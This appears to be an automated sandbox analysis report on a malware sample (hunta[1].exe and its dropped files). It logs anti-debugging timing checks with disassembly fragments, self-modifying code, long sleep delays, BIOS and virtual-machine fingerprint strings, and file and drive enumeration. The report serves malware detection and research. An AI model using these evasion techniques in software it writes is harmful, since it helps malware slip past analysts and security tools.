Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C0052 second address: 59C0056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C0056 second address: 59C005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C005C second address: 59C0075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C35h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C0075 second address: 59C009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF2E5514DEDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C009D second address: 59C00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FF2E55A2C2Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FF2E55A2C30h 0x00000019 call 00007FF2E55A2C29h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 1F141A80h 0x00000026 mov esi, edi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C00EA second address: 59C00EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C00EF second address: 59C0112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C0112 second address: 59C01A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 mov ebx, 3A921896h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 mov al, 31h 0x00000026 pushfd 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c or cx, 051Eh 0x00000031 jmp 00007FF2E5514DF9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF2E5514DF3h 0x00000042 jmp 00007FF2E5514DF3h 0x00000047 popfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 597081A second address: 5970820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970820 second address: 5970824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970824 second address: 5970853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E55A2C2Dh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, A69Eh 0x00000016 call 00007FF2E55A2C2Fh 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970853 second address: 597087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1046808Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF2E5514DEAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF2E5514DEDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 597087B second address: 5970881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970881 second address: 5970898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970898 second address: 59708B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59708B5 second address: 59708BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59708BB second address: 59708BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59708BF second address: 59708C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\hunta[1].exe	Special instruction interceptor: First address: FCDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe	Special instruction interceptor: First address: 116EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hunta[1].exe	Special instruction interceptor: First address: 11F6B5C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: 44DA5D instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: 5EEA53 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Special instruction interceptor: First address: 676B5C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 3BDA5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 55EA53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Special instruction interceptor: First address: 5E6B5C instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\hunta[1].exe

Code function: 2_2_059B056A rdtsc

2_2_059B056A

Source: C:\Users\user\Desktop\hunta[1].exe	Window / User API: threadDelayed 1037	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1232	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1134	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 777	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1223	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 1103	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Window / User API: threadDelayed 710	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1226	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1247	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 558	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1432	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 570	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1021
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1047
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1008
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 1013
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Window / User API: threadDelayed 927

Source: C:\Users\user\Desktop\hunta[1].exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)			graph_2-23673
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)			graph_21-23073

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Evaded block: after key decision

graph_22-1182

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_4-1048

Source: C:\Users\user\Desktop\hunta[1].exe TID: 7636	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612	Thread sleep count: 1037 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612	Thread sleep time: -2075037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420	Thread sleep count: 122 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420	Thread sleep count: 216 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hunta[1].exe TID: 8100	Thread sleep count: 230 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732	Thread sleep time: -202101s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944	Thread sleep count: 110 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944	Thread sleep time: -220110s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7860	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108	Thread sleep count: 1232 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108	Thread sleep time: -124432s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008	Thread sleep count: 1134 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008	Thread sleep count: 777 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008	Thread sleep time: -77700s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956	Thread sleep count: 115 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956	Thread sleep time: -230115s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176	Thread sleep time: -242121s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180	Thread sleep count: 118 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180	Thread sleep time: -236118s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088	Thread sleep time: -172086s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824	Thread sleep time: -256128s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176	Thread sleep count: 138 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176	Thread sleep time: -276138s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128	Thread sleep count: 1223 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128	Thread sleep time: -123523s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708	Thread sleep count: 1103 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708	Thread sleep count: 710 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708	Thread sleep time: -71000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220	Thread sleep count: 123 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220	Thread sleep time: -246123s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236	Thread sleep time: -258129s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560	Thread sleep count: 1226 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560	Thread sleep time: -2453226s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688	Thread sleep count: 1247 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688	Thread sleep time: -2495247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876	Thread sleep count: 126 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200	Thread sleep count: 558 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200	Thread sleep time: -1116558s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876	Thread sleep count: 260 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948	Thread sleep count: 1432 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948	Thread sleep time: -2865432s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2288	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696	Thread sleep count: 570 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696	Thread sleep time: -1140570s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800	Thread sleep count: 1021 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800	Thread sleep time: -2043021s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732	Thread sleep count: 1047 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732	Thread sleep time: -2095047s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312	Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788	Thread sleep count: 1008 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788	Thread sleep time: -2017008s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312	Thread sleep count: 281 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6996	Thread sleep count: 229 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092	Thread sleep count: 1013 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092	Thread sleep time: -2027013s >= -30000s
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136	Thread sleep count: 927 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136	Thread sleep time: -1854927s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_00211718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00211754h		4_2_00211718
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B51754h		22_2_00B51718

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		4_2_002129E2
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	Code function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		22_2_00B529E2

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe

Code function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

4_2_00212B8C

Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.:^G
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000ok\AppData\Local\Temp\heidig8C
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/:VN)
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&z
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RageMP131.exe, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: RageMP131.exe, 00000018.00000003.1589365836.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000E.00000002.3734942241.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA2
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
